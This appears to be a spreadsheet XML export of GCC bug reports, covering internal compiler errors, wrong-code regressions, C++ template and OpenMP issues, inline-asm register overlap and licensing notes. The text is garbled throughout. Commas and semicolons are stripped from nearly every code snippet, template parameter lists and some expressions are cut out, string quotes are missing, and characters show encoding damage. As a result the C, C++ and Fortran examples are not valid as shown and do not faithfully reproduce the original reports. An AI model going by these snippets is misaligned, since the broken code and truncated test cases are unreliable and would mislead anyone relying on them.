make[3]: Leaving katalog `/root/Mesa-4.0.3old/src'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving katalog `/root/Mesa-4.0.3old/src'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving katalog `/root/Mesa-4.0.3old'
make: *** [all] Error 2
Release:
gcc-3.1
Environment:
Linux Slackware 8.1
How-To-Repeat:
Download MesaLib-4.0.3.tar.bz2 configure and make</t>
  </si>
  <si>
    <t>wiono</t>
  </si>
  <si>
    <t>GCC-24497</t>
  </si>
  <si>
    <t>[4.0 Regression] internal compiler error: in apply_opt_in_copies at loop-unroll.c:2122</t>
  </si>
  <si>
    <t>long long foo(void)
{
  long long unsigned s=0
  long long unsigned b
  for (b = 0 b++ s == 0 )
    {
      s = b
    }
  return s
}
Compiled with -O2 -funroll-all-loops gives
internal compiler error: in apply_opt_in_copies at loop-unroll.c:2122
The problematic line is:
gcc_assert (rtx_equal_p (PATTERN (insn) PATTERN (orig_insn)))
And PATTERN(insn) is
(parallel [
        (set (reg/v:DI 32 [ b ])
            (plus:DI (reg/v:DI 32 [ b ])
                (const_int 1 [0x1])))
        (clobber (scratch:SI))
    ])
This fails because rtx_equal_p thinks the two (scratch:SI) are different scratch registers and returns 0.</t>
  </si>
  <si>
    <t>GCC-11036</t>
  </si>
  <si>
    <t>typedef-name used in an elaborated-type-specifier is incorrectly accepted</t>
  </si>
  <si>
    <t>The following code is illegal per Â§7.1.5.3/2:
-----------------------------
struct A {}
struct B
{
    typedef A T
    friend struct T
}
-----------------------------
GCC accepts it without even a warning (from 2.95 to current mainline) even 
with -pedantic.</t>
  </si>
  <si>
    <t>GCC-5168</t>
  </si>
  <si>
    <t>wrong memory representation of special wchar_t characters like Â® (the registered trademark sign)</t>
  </si>
  <si>
    <t>We have a sample program ftped from a Windows machine. It uses special characters above ASCII 128 like the registered trademark characters 0xae. If we define a wchar_t variables and assign this character the pointer to the variable shows a value 0xffffffae. With Linux S/390 and x86 it works fine and the value is 0xae as expected. I attach the sample program.
Release:
gcc 3.0.2 for RedHat 7.1 Itanium-64
Environment:
RedHat 7.1 gcc 3.0.2 libc 2.2.3
How-To-Repeat:
g++ -g -o test wchar.cxx
run ./test to see the output</t>
  </si>
  <si>
    <t>volker.denkhaus</t>
  </si>
  <si>
    <t>GCC-50086</t>
  </si>
  <si>
    <t>[C++0x] Error on lookup of template function address with variadic template arguments</t>
  </si>
  <si>
    <t>G++ 4.6.1 fails to get the address of a template function if it's passed to a variadic argument list:
template
void tfun() { }
template
void fun1(T(*)())
{
    cout &lt;&lt; hello world &lt;&lt; endl
}
template
void fun2(Types... args)
{
    fun1(args...)
}
int main()
{
    fun1(tfun) // ok prints hello world
    fun2(tfun) // error: unresolved overloaded function type
    return 0
}</t>
  </si>
  <si>
    <t>edward.schere</t>
  </si>
  <si>
    <t>GCC-37951</t>
  </si>
  <si>
    <t>-ftree-parallelize-loops=2 fails</t>
  </si>
  <si>
    <t>Compiling ma57 with 
gfortran -O -ftree-parallelize-loops=2 -c ma57.f -o ma57.o
produces the following error messages:
 = 12
----------
ma57.f: In function 'ma57od':
ma57.f:2724: error: edge from 676 to 686 should be marked irreducible
ma57.f:2724: error: basic block 686 should be marked irreducible
ma57.f:2724: error: edge from 686 to 679 should be marked irreducible
ma57.f:2724: error: basic block 679 should be marked irreducible
ma57.f:2724: error: edge from 679 to 124 should be marked irreducible
ma57.f:2724: confused by earlier errors bailing out
 = 3
--------
ma57.f: In function 'ma57od':
ma57.f:2724: error: edge from 840 to 850 should be marked irreducible
ma57.f:2724: error: basic block 850 should be marked irreducible
ma57.f:2724: error: edge from 850 to 843 should be marked irreducible
ma57.f:2724: error: basic block 843 should be marked irreducible
ma57.f:2724: error: edge from 843 to 160 should be marked irreducible
ma57.f:2724: confused by earlier errors bailing out
Since the HSL codes are subject to restricted licenses I am pretty sure that I am not supposed to include its source-code here. You can have a look at http://www.cse.scitech.ac.uk/nag/hsl/ though if you are eligible to obtain a copy of ma57!
My gcc version:
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: /localdata/install/gcc/gcc-4.3.2/configure --prefix=/home/dwassel --program-suffix=-4.3.2 --enable-languages=cc++fortran --with-gmp=/home/dwassel --with-mpfr=/home/dwassel --with-arch=athlon64 --with-tune=athlon64 --enable-version-specific-runtime-libs
Thread model: posix
gcc version 4.3.2 (GCC)</t>
  </si>
  <si>
    <t>GCC-20663</t>
  </si>
  <si>
    <t>Generic function is not resolved</t>
  </si>
  <si>
    <t>This is Walt Brainerd's fc005.f95.
kargl[227] gfc41 -static -o z fc005.f95
 In file fc005.f95:23
if (.not. close(rx rr)) then
              1
Error: Symbol 'close' at (1) has no IMPLICIT type</t>
  </si>
  <si>
    <t>GCC-11395</t>
  </si>
  <si>
    <t>problem with asm inserts used as immediate arguments</t>
  </si>
  <si>
    <t>the following fragment will segv gcc
t64.c: In function `main':                                                      
t64.c:16: internal error: Segmentation fault   
#define __byte_swap_word(x) \                                                   
({ register unsigned short __X = (x) \                                         
   __asm (xchgb %h1 %b1 \                                                    
: =q (__X) \                                                                  
: 0 (__X)) \                                                                 
   __X })                                                                      
void foo(short x)                                                               
{                                                                               
}                                                                               
main()                                                                          
{                                                                               
  foo(__byte_swap_word(5))                                                     
}                                                                               
the problem goes away if:
  the register declaration before __X is removed
  the result of the macro is stored into a temporary before used as an argument
    to foo</t>
  </si>
  <si>
    <t>hoffman</t>
  </si>
  <si>
    <t>GCC-5840</t>
  </si>
  <si>
    <t>inline asm: register output parameter overlaps with indirect output parameter</t>
  </si>
  <si>
    <t>The problem is shown on the bench-test example.
For input file sbb6.c:
=== begin sbb6.c ===
void m_sbb( int* pnc int* pd int* pnf int a int b int c )
{
   asm(
      mov %5%%edi\n\t
      shr %%edi\n\t
      sbb %4%0\n\t
      pushf\n\t
      setc %b1\n\t
      movzbl %b1%1\n\t
      popl %2
      : =r ( *pd ) =q ( *pnc ) =g ( *pnf )
      : 0 ( a ) g ( b ) g ( c ) : ccedi )
}
=== end sbb6.c ===
and for gcc 2.95.3 the command `gcc -fverbose-asm -g -S sbb6.c' produces
assembly file which contains:
=== cut sbb6.s ===
#APP
        mov 28(%ebp)%edi
        shr %edi
        sbb 24(%ebp)%edx
        pushf
        setc %al
        movzbl %al%eax
        popl (%eax)
#NO_APP
=== end cut ===
One can see that %2 is `(%eax)' %1 is `%eax' and they overlaps.
With optimization level &gt;=1 the effect disappears. Example of correct
code with the same options as above but with -O added:
=== cut sbb6.s.o1 ===
#APP
        mov 28(%ebp)%edi
        shr %edi
        sbb 24(%ebp)%eax
        pushf
        setc %dl
        movzbl %dl%edx
        popl (%ecx)
#NO_APP
=== end cut ===
These results for 2.95.3 are identical for all tested versions of it.
On the other side with 2.7.2.3 and 2.7.2.1 the effect appears only
with non-zero optimization level with the following result:
=== cut sbb6.s ===
#APP
        mov %eax%edi
        shr %edi
        sbb %edx%ecx
        pushf
        setc %bl
        movzbl %bl%ebx
        popl (%ebx)
#NO_APP
=== end cut ===
(command was: `gcc -fverbose-asm -g -S sbb6.c')
With -O0 no overlapping occurs.
Release:
2.95.3 2.7.2.3
Environment:
The problem is of inline assembler on i386 architecture.
This was reproduced on variety of 2.95.3 and 2.7.2.x packages of gcc
from a bunch of platforms. Details on this gcc packages are listed below.
2.95.3 today from GCC main ftp also shows it.
I failed to reproduce it on: 3.0.2 from FreeBSD port (ports/lang/gcc30
PORTVERSION=3.0.2 PORTREVISION=0)
also on: 2.91.66 from RedHat 6.2
also on: 2.96 20000731 from RedHat 7.1 (package gcc-2.96-85)
How-To-Repeat:
See source file and commands shown above.
Details on gcc versions where this occurs:
gcc 2.95.3 from GCC main ftp compiled on FreeBSD 4.4-RELEASE
with commands:
./configure --prefix=/usr/local/gcc/2.95.3
gmake
gmake install
and called as: /usr/local/gcc/2.95.3/bin/gcc -fverbose-asm -g -S sbb6.c
for FreeBSD4 versions:
$ gcc -v
Using builtin specs.
gcc version 2.95.3 20010315 (release) [FreeBSD]
this is canonical gcc from FreeBSD installation.
For 2.95.3 from mandrake:
$ gcc -v
Reading specs from /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/specs
gcc version 2.95.3 19991030 (prerelease)
$ rpm -qf /usr/bin/gcc-2.95.2
gcc-2.95.2-12mdk
(Sorry but no more details for this - I'm not root on this host.)
The same `2.95.3 19991030 (prerelease)' from OpenBSD 2.8-current
shows the same result.
For 2.95.3 from OpenBSD 2.9:
$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-unknown-openbsd2.9/2.95.3/specs
gcc version 2.95.3 20010125 (prerelease)
$ uname -mrs
OpenBSD 2.9 i386
For 2.7.2.3 from FreeBSD 3.3:
$ gcc -v
gcc version 2.7.2.3
Also this is version from standard FreeBSD installation.
Also on 2.7.2.1 from unidentified Slackware with the same results
as with 2.7.2.3.</t>
  </si>
  <si>
    <t>netch</t>
  </si>
  <si>
    <t>GCC-47866</t>
  </si>
  <si>
    <t>[4.5 Regression] gcc.dg/torture/vector-2.c fails on IA64</t>
  </si>
  <si>
    <t>gcc.dg/torture/vector-2.c is failing on Linux and HP-UX IA64 platforms since r165240 which is Richard Henderson's fix for PR rtl-opt/33721.  This may be a target specific bug but the change that caused the failure to show up is not target specific.
gcc.dg/torture/vector-2.c fails at -O2 but passes at -O0 or -O1.  With the
latest sources I can use this cutdown test case to see the difference:
#define vector __attribute__((vector_size(16) ))
vector int f0(vector int t int a)
{
 ((int*)
 return t
}
vector int f1(vector int t int a)
{
 ((int*)
 return t
}
int main(void)
{
  vector int a = {0 0 0 0}
  vector int a0
  a0 = f0(a 1)
  printf(%d %d %d %d\n a0[0] a0[1] a0[2] a0[3])
  a0 = f1(a 1)
  printf(%d %d %d %d\n a0[0] a0[1] a0[2] a0[3])
  return 0
}
At -O0 or -O1 it prints:
1 0 0 0
0 1 0 0
At -O2 it prints:
1 0 0 0
0 0 0 0</t>
  </si>
  <si>
    <t>GCC-30984</t>
  </si>
  <si>
    <t>[4.1/4.2/4.3 Regression] ICE with computed goto and constants</t>
  </si>
  <si>
    <t>int fs_exec(int ino)
{
 void *src = 0
 if (ino)
   src = (void*)0xe000
 goto *src
}
Reduced from http://gcc.gnu.org/ml/gcc-bugs/2007-02/msg02973.html.</t>
  </si>
  <si>
    <t>GCC-44016</t>
  </si>
  <si>
    <t>Old link inside the documentation</t>
  </si>
  <si>
    <t>There is a old link under gcc.info / Node: Standards / 2.2 C++ language.
The link to the `http://gcc.gnu.org/gcc-4.3/cxx0x_status.html' shows to the old version 4.3. it has to be updated to 4.5</t>
  </si>
  <si>
    <t>ost.wolf</t>
  </si>
  <si>
    <t>GCC-52438</t>
  </si>
  <si>
    <t>Some files still GPLv2</t>
  </si>
  <si>
    <t>This is for trunk at r184666.
Probably should be removed (?):
* gcc/COPYING
* Only referenced in sourcebuild.texi:
gcc/doc/include/gpl.texi
FSF not (only) copyright holder (so can't change license?):
* gcc/ada/s-osinte-kfreebsd-gnu.ads
* gcc/ada/s-osinte-rtems.adb
* gcc/ada/s-taspri-lynxos.ads
* gcc/ada/s-tpopsp-rtems.adb
No good reason to be GPLv2:
* gcc/config/mn10300/mn10300-modes.def
* gcc/config/v850/v850-modes.def</t>
  </si>
  <si>
    <t>GCC-39168</t>
  </si>
  <si>
    <t>Incorrect interpretation of CHAR_MAX inside grouping string in monetary and numeric facets.</t>
  </si>
  <si>
    <t>Description of numpunct::do_grouping() (22.2.3.1.2 p3): 
Returns: A basic_string vec used as a vector of integer values in which each element vec[i] represents the number of digits in the group at position i starting with position 0 as the rightmost group. If vec.size() &lt;= i the number is the same as group (i-1) if (i&lt;0 || vec[i]&lt;=0 || vec[i]==CHAR_MAX) the size of the digit group is unlimited. 
But num_put and num_get implementations don't interpret condition (vec[i]==CHAR_MAX) as condition of group with unlimited size but interpret value CHAR_MAX as regular size of digits group.
According to the code condition (static_cast(vec[i]) &gt; 0) is used as an indicator of regular group size. This means range 1..127 for vec[i] values.
But on architectures with char ~ signed char(e.g. x86) CHAR_MAX is 127 so the range shouldn't include value 127.
In tests string(1 CHAR_MAX) is used as grouping string. Like string() and string(1 -1) this should disable grouping at all.
But on architectures with char ~ signed char tests failed. On architectures with char ~ unsigned char or when CHAR_MAX replaced with -1 all became ok.</t>
  </si>
  <si>
    <t>GCC-52424</t>
  </si>
  <si>
    <t>dom prematurely pops entries from const_and_copies stack</t>
  </si>
  <si>
    <t>Created attachment 26775
Proposed patch of tree-ssa-dom.c
Jiangning Liu reported that the following C code has recently experienced degraded performance on trunk.  (Jiangning please fill in the Host/Target/Build fields for your configuration or tell me what they are if you don't have access.  The problem is not related to specific targets in any event.)
int *l *r *g
void test_func(int n)
{
	int i
	static int j
	static int pos direction direction_pre
	pos = 0
	direction = 1
	for ( i = 0 i &lt; n i++ )
	{
		direction_pre = direction
		for ( j = 0 j &lt;= 400 j++ )
		{
			if ( g[pos] == 200 )
				break
			if ( direction == 0 )
				pos = l[pos]
			else
				pos = r[pos]
			if ( pos == -1 )
			{
				if ( direction_pre != direction )
					break
				pos = 0
				direction = !direction
			}
		}
		f(g[pos])
	}
}
When compiled with -O2 the dom2 details dump shows that a redundant phi is detected in block 12:
:
  # prephitmp.28_89 = PHI 
  # pos_lsm.33_53 = PHI 
LKUP STMT prephitmp.28_89 = PHI 
          prephitmp.28_89 = PHI 
2&gt;&gt;&gt; STMT prephitmp.28_89 = PHI 
          prephitmp.28_89 = PHI 
LKUP STMT pos_lsm.33_53 = PHI 
          pos_lsm.33_53 = PHI 
FIND: prephitmp.28_89
0&gt;&gt;&gt; COPY pos_lsm.33_53 = prephitmp.28_89
However the COPY is incorrectly removed from the const_and_copy stack after block 13 is processed.  It should not be removed until after the last block dominated by bb12 (bb18) is processed.  As a result the copy is not propagated into a PHI in block 15:
  # pos_lsm.33_123 = PHI 
As a result an extra copy is eventually introduced that degrades performance.
I tracked down the extra removal of const_and_copy stack entries to tree-ssa-threadedge.c:remove_temporary_equivalences.  This removes pairs of entries that were introduced by thread_across_edge and also removes a NULL marker entry beneath those entries.  Thus calls to thread_across_edge must be preceded by a push of such a marker entry.
thread_across_edge is called from tree-ssa-dom.c:dom_thread_across_edge which is called in three places within dom_opt_leave_block.  In two of those places the push of a marker entry is present.  In the third it isn't.  Adding the marker push appears to correct the problem.
I've attached a proposed fix.  Jiangning can you please apply this and see if your performance problem is resolved?
Thanks
Bill</t>
  </si>
  <si>
    <t>GCC-70376</t>
  </si>
  <si>
    <t>OpenMP taskloop construct fails to instantiate copy constructor(same as Bug 48869)</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #48869 +++
template
struct A
{
  A() { }
  A(const A&amp;) { }
  void foo() { }
}
int
main ()
{
  A a
  #pragma omp taskloop
  for (int i = 0 i &lt; 64 i++)
    a.foo()
  return 0
}
$ .../gcc/xg++ -B .../gcc/ -fopenmp -o pr48869 pr48869.C  -B .../x86_64-pc-linux-gnu/libgomp/ -L .../x86_64-pc-linux-gnu/libgomp/.libs/ -L .../x86_64-pc-linux-gnu/libstdc++-v3/src/.libs/
/tmp/ccMYsukb.o: In function `main._omp_cpyfn.1':
pr48869.C:(.text+0xcc): undefined reference to `A::A(A const&amp;)'
collect2: error: ld returned 1 exit status</t>
  </si>
  <si>
    <t>GCC-6101</t>
  </si>
  <si>
    <t>sparc-sun-solaris2.7 gcc-3.1 RTL checking failures in libstdc++-v3 tests w/-m64</t>
  </si>
  <si>
    <t>These failures require -m64 to trigger:
FAIL: 21_strings/append.cc (test for excess errors)
FAIL: 21_strings/capacity.cc (test for excess errors)
FAIL: 21_strings/ctor_copy_dtor.cc (test for excess errors)
FAIL: 21_strings/insert.cc (test for excess errors)
FAIL: 21_strings/nonmember.cc (test for excess errors)
FAIL: 21_strings/replace.cc (test for excess errors)
FAIL: 22_locale/collate.cc (test for excess errors)
FAIL: 22_locale/money_get.cc (test for excess errors)
FAIL: 22_locale/money_get_members_char.cc (test for excess errors)
FAIL: 22_locale/money_put.cc (test for excess errors)
FAIL: 22_locale/money_put_members_char.cc (test for excess errors)
FAIL: 22_locale/num_get_members_char.cc (test for excess errors)
FAIL: 22_locale/num_put_members_char.cc (test for excess errors)
FAIL: 22_locale/time_get_members_char.cc (test for excess errors)
FAIL: 22_locale/time_put_members_char.cc (test for excess errors)
FAIL: 26_numerics/complex_inserters_extractors.cc (test for excess errors)
FAIL: 27_io/ios_init.cc (test for excess errors)
FAIL: 27_io/streambuf.cc (test for excess errors)
they are RTL checking failures.  Here's an example:
 &gt; /teal/caip5/ghazi/gcc-testing/branch/build/sparc-sun-solaris2.7/sparcv9/libstdc++-v3/include/bits/basic_string.tcc:
 &gt;   In static member function `static _CharT* std::basic_string&lt;_CharT
 &gt;   _Traits _Alloc&gt;::_S_construct(_InIter _InIter const _Alloc&amp;
 &gt;   std::forward_iterator_tag) [with _FwdIter = char* _CharT = char
 &gt;   _Traits = std::char_traits _Alloc = std::allocator]':
 &gt; /teal/caip5/ghazi/gcc-testing/branch/build/sparc-sun-solaris2.7/sparcv9/libstdc++-v3/include/bits/basic_string.tcc:161:
 &gt;   RTL check: expected code `const_int' have `concat' in
 &gt;   output_v9branch at config/sparc/sparc.c:5560
 &gt; FAIL: 27_io/streambuf.cc (test for excess errors)
Release:
gcc version 3.1 20020328 (prerelease)
Environment:
sparc-sun-solaris2.7 native as/ld
How-To-Repeat:
configure with --enable-checking=misctreertlgc on solaris2.7 bootstrap and run make check</t>
  </si>
  <si>
    <t>GCC-12840</t>
  </si>
  <si>
    <t>[4.0 only] Unable to find scalarization loop specifier</t>
  </si>
  <si>
    <t>The following should compile :
  SUBROUTINE pz_lsd ( order )
    INTEGER :: orderm
    m = SUM((/ (m+1m=0order) /))
  END SUBROUTINE pz_lsd
  END</t>
  </si>
  <si>
    <t>GCC-50133</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: SIGSEGV in vect_finish_stmt_generation (gimple.h:4821) with -ftree-vectorize -fno-tree-loop-im</t>
  </si>
  <si>
    <t>Created attachment 25057
testcase (gcc.dg/pr46184.c)
Compiler output:
$ gcc -O -ftree-vectorize -fno-tree-loop-im testcase.c
==6443== Invalid read of size 8
==6443==    at 0xB053E1: vect_finish_stmt_generation(gimple_statement_d* gimple_statement_d* gimple_stmt_iterator*) (gimple.h:4821)
==6443==    by 0xB05C8E: vect_init_vector(gimple_statement_d* tree_node* tree_node* gimple_stmt_iterator*) (tree-vect-stmts.c:1082)
==6443==    by 0xB07625: vectorizable_load(gimple_statement_d* gimple_stmt_iterator* gimple_statement_d** _slp_tree* _slp_instance*) (tree-vect-stmts.c:4626)
==6443==    by 0xB1268C: vect_transform_stmt(gimple_statement_d* gimple_stmt_iterator* bool* _slp_tree* _slp_instance*) (tree-vect-stmts.c:5197)
==6443==    by 0xB2270B: vect_transform_loop(_loop_vec_info*) (tree-vect-loop.c:5332)
==6443==    by 0xB2F678: vectorize_loops() (tree-vectorizer.c:205)
==6443==    by 0x8A6046: execute_one_pass(opt_pass*) (passes.c:2063)
==6443==    by 0x8A63B4: execute_pass_list(opt_pass*) (passes.c:2118)
==6443==    by 0x8A63C6: execute_pass_list(opt_pass*) (passes.c:2119)
==6443==    by 0x8A63C6: execute_pass_list(opt_pass*) (passes.c:2119)
==6443==    by 0x9FE69D: tree_rest_of_compilation(tree_node*) (tree-optimize.c:420)
==6443==    by 0x653A55: cgraph_expand_function(cgraph_node*) (cgraphunit.c:1797)
==6443==    by 0x6557BA: cgraph_optimize() (cgraphunit.c:1856)
==6443==    by 0x655E49: cgraph_finalize_compilation_unit() (cgraphunit.c:1310)
==6443==    by 0x537367: c_write_global_declarations() (c-decl.c:9881)
==6443==    by 0x99C191: toplev_main(int char**) (toplev.c:564)
==6443==    by 0x6734D2C: (below main) (in /lib64/libc-2.12.2.so)
==6443==  Address 0x0 is not stack'd malloc'd or (recently) free'd
==6443== 
testcase.c: In function 'foo':
testcase.c:4:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r177889 - crash
r177543 - crash
r173150 - OK</t>
  </si>
  <si>
    <t>GCC-2428</t>
  </si>
  <si>
    <t>Classloader is not set</t>
  </si>
  <si>
    <t>Classloader seems to be null.
Release:
gcc version 3.0 20010320 (prerelease)
Environment:
 uname -a
Linux inception 2.2.12-20 #1 Mon Sep 27 10:40:35 EDT 1999 i686 unknown
Gcc Configured with: ../gcc-20010320/configure --enable-threads=posix --prefix=/tmp/local/ --enable-shared --enable-languages=c++java
How-To-Repeat:
Compile and look at the output. On my system classloader comes out as null.</t>
  </si>
  <si>
    <t>GCC-5956</t>
  </si>
  <si>
    <t>selectors aren't matched properly when added to the selector table</t>
  </si>
  <si>
    <t>Due to a simple mixup build_typed_selector_reference() won't properly match the new selector with existing selectors (TREE_PURPOSE() and TREE_VALUE()) are mixed up).
This doesn't cause incorrect code but the selector tables are unnecessarily large it bloats all objective-c code (by approximately 10% in the cases I've measured).
I've attached a patch that fixes this.
Release:
gcc version 3.0.3
How-To-Repeat:
Compile any program that contains two references to the same selector eg:
[someobject foo]
[someobject foo]
The resulting selector table will have to entries for 'foo'.</t>
  </si>
  <si>
    <t>GCC-60854</t>
  </si>
  <si>
    <t>[4.9 Regression] inline constructor of extern template</t>
  </si>
  <si>
    <t>Created attachment 32610
source file
this code was accepted by gcc-4.8 up to (at least) gcc-4.9-20140323 but g++ (GCC) 4.9.0 20140411 (prerelease) complains.
compiled with
g++ -c -O2 --std=c++11 test.cpp
error message of gcc-4.9.0 prerelease:
test.cpp: In function â€˜void Func()â€™:
test.cpp:5:46: error: inlining failed in call to always_inline â€˜MyClass::MyClass() [with T = double]â€™: function body not available
   __attribute__ ((__always_inline__)) inline MyClass () {  }
                                              ^
test.cpp:12:19: error: called from here
   MyClass x
                   ^</t>
  </si>
  <si>
    <t>joachim.schoeberl</t>
  </si>
  <si>
    <t>GCC-8390</t>
  </si>
  <si>
    <t>Object layout: empty virtual base allocation failure</t>
  </si>
  <si>
    <t>In the test-case listed below G++ 3.2 compiler makes wrong layout of class C4. Empty virtual base C3 takes non-empty space.
--- fail.cpp ------------------------
struct C3
{
}
struct C2:  C3
{
    virtual int f1() { return 2 }
}
struct C4:  C2 virtual C3
{
        short m1
        C4() { m1 = (short) 0x4444 }
}
C4 obj
-------------------------------------
Object layout (got from g++ -fdump-class-hierarchy -c fail.cpp) is:
	Class C4
	   size=12 align=4
	C4 (0x4031cc00) 0
	    vptridx=0 vptr=((&amp;C4::_ZTV2C4) + 12)
	  C2 (0x4031cc40) 0 nearly-empty
	      primary-for C4 (0x4031cc00)
	    C3 (0x4031cc80) 0 empty
	  C3 (0x4031ccc0) 8 empty virtual canonical
	      vbaseoffset=-12
The binary dump of object is:
	[obj+0x00] Virtual table _ZTV2C4 adress point 0xc
	[obj+0x04] 00004444
	[obj+0x08] 00000000
We see that virtual base C3 is allocated at offset 8 and takes 4 bytes. There is the misstake - C3 should not take any space here!
Expected layout is (binary format):
	[obj+0x00] Virtual table _ZTV2C4 adress point 0xc
	[obj+0x04] 00004444
Release:
3.2
Environment:
$ g++ -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/3.2/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --host=i386-redhat-linux --with-system-zlib --enable-__cxa_atexit
Thread model: posix
gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7)</t>
  </si>
  <si>
    <t>GCC-41237</t>
  </si>
  <si>
    <t>[4.5 Regression] Bootstrap failure on powerpc-apple-darwin9 due to a revision between 151343 and 151349</t>
  </si>
  <si>
    <t>Bootstrap fails on powerpc-apple-darwin9 due to a revision between 151343 and 151349 (see http://gcc.gnu.org/ml/gcc-regression/2009-09/msg00024.html):
/opt/gcc/darwin_buildw/./prev-gcc/xgcc -B/opt/gcc/darwin_buildw/./prev-gcc/ -B/opt/gcc/gcc4.5w/powerpc-apple-darwin9/bin/ -B/opt/gcc/gcc4.5w/powerpc-apple-darwin9/bin/ -B/opt/gcc/gcc4.5w/powerpc-apple-darwin9/lib/ -isystem /opt/gcc/gcc4.5w/powerpc-apple-darwin9/include -isystem /opt/gcc/gcc4.5w/powerpc-apple-darwin9/sys-include     -g -O2 -mdynamic-no-pic -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -DGENERATOR_FILE  -o build/genrecog \
	    build/genrecog.o build/rtl.o build/read-rtl.o build/ggc-none.o build/vec.o build/min-insn-modes.o build/gensupport.o build/print-rtl.o build/errors.o .././libiberty/libiberty.a
build/genrecog ../../gcc-4.5-work/gcc/config/rs6000/rs6000.md \
	  insn-conditions.md &gt; tmp-recog.c
../../gcc-4.5-work/gcc/config/rs6000/rs6000.md:12910: warning: operand 1 missing mode?
../../gcc-4.5-work/gcc/config/rs6000/altivec.md:1690: warning: operand 1 missing mode?
../../gcc-4.5-work/gcc/config/rs6000/altivec.md:1697: warning: operand 1 missing mode?
../../gcc-4.5-work/gcc/config/rs6000/altivec.md:1851: warning: destination missing a mode?
../../gcc-4.5-work/gcc/config/rs6000/altivec.md:1851: warning: operand 0 missing mode?
../../gcc-4.5-work/gcc/config/rs6000/altivec.md:2366: warning: operand 1 missing mode?
../../gcc-4.5-work/gcc/config/rs6000/altivec.md:2374: warning: operand 1 missing mode?
../../gcc-4.5-work/gcc/config/rs6000/altivec.md:2382: warning: operand 1 missing mode?
../../gcc-4.5-work/gcc/config/rs6000/altivec.md:2390: warning: operand 1 missing mode?
../../gcc-4.5-work/gcc/config/rs6000/altivec.md:2632: warning: operand 1 missing mode?
../../gcc-4.5-work/gcc/config/rs6000/altivec.md:2632: warning: operand 2 missing mode?
../../gcc-4.5-work/gcc/config/rs6000/altivec.md:2641: warning: operand 1 missing mode?
../../gcc-4.5-work/gcc/config/rs6000/altivec.md:2641: warning: operand 2 missing mode?
/bin/sh ../../gcc-4.5-work/gcc/../move-if-change tmp-recog.c insn-recog.c
echo timestamp &gt; s-recog
/opt/gcc/darwin_buildw/./prev-gcc/xgcc -B/opt/gcc/darwin_buildw/./prev-gcc/ -B/opt/gcc/gcc4.5w/powerpc-apple-darwin9/bin/ -B/opt/gcc/gcc4.5w/powerpc-apple-darwin9/bin/ -B/opt/gcc/gcc4.5w/powerpc-apple-darwin9/lib/ -isystem /opt/gcc/gcc4.5w/powerpc-apple-darwin9/include -isystem /opt/gcc/gcc4.5w/powerpc-apple-darwin9/sys-include    -c  -g -O2 -mdynamic-no-pic -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../gcc-4.5-work/gcc -I../../gcc-4.5-work/gcc/. -I../../gcc-4.5-work/gcc/../include -I../../gcc-4.5-work/gcc/../libcpp/include -I/opt/mpc/build//include  -I/sw/include  -I../../gcc-4.5-work/gcc/../libdecnumber -I../../gcc-4.5-work/gcc/../libdecnumber/dpd -I../libdecnumber -I/sw/include  -I/sw/include -DCLOOG_PPL_BACKEND   insn-recog.c -o insn-recog.o
[address=03d551b2 pc=00803828]
../../gcc-4.5-work/gcc/config/rs6000/altivec.md: In function 'recog_49':
../../gcc-4.5-work/gcc/config/rs6000/altivec.md:329:1: internal compiler error: Segmentation Fault</t>
  </si>
  <si>
    <t>GCC-77478</t>
  </si>
  <si>
    <t>Incorrect code generated with -O3 m32 -msse2 and -ffast-math</t>
  </si>
  <si>
    <t>Created attachment 39555
The output of -save-temps
Apologies if I've selected the wrong component - I suspect this issue is something wrong in one of the optimization phases but was not sure what component to select.
The attached program will crash with a segmentation fault when compiled with the specified arguments. The generated code appears to be generating aligned vector load instructions on a not properly aligned address. I've tried to reduce the program and compiler arguments as much as I can into something which still triggers the behavior.
* the exact version of GCC
* the system type
* the options given when GCC was configured/built
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/5/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 5.4.0-6ubuntu1~16.04.2' --with-bugurl=file:///usr/share/doc/gcc-5/README.Bugs --enable-languages=cadac++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-5 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=new --enable-gnu-unique-object --disable-vtable-verify --enable-libmpx --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-5-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-5-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-5-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.2) 
